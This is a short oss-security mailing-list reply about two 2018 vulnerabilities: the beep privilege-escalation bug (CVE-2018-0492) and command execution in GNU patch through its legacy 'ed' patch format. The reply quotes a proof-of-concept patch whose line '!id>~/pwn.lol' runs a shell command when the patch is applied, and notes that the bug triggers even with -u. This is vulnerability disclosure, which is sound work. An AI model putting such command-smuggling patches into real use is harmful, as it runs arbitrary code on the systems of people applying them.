oss-security - Re: Privsec vuln in beep / Code execution in GNU patch

Follow @Openwall on Twitter for new release announcements and other news

[<prev] [next>] [<thread-prev] [day] [month] [year] [list]

Message-ID: <20180406095140.qhrrbwmwrir4nxhb@jwilk.net>
Date: Fri, 6 Apr 2018 11:51:40 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: Re: Privsec vuln in beep / Code execution in GNU patch

* Hanno Böck <hanno@...eck.de>, 2018-04-06, 08:52:
>There was a joke webpage about a vulnerability in beep a few days ago:
>http://holeybeep.ninja/
>There's also a corresponding Debian Advisory:
>https://lists.debian.org/debian-security-announce/2018/msg00089.html
>Neither have any technical details. CVE is CVE-2018-0492.
>
>If anyone knows the background of this please share it.

Upstream bug report:
https://github.com/johnath/beep/issues/11

>GNU patch supports a legacy "ed" format for patches and that allows 
>executing external commands.
[...]
>--- a	2018-13-37 13:37:37.000000000 +0100
>+++ b	2018-13-37 13:38:38.000000000 +0100
>1337a
>1,112d
>!id>~/pwn.lol

This bug triggers even with -u (which is supposed to disable patch type 
detection). :-/

-- 
Jakub Wilk

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.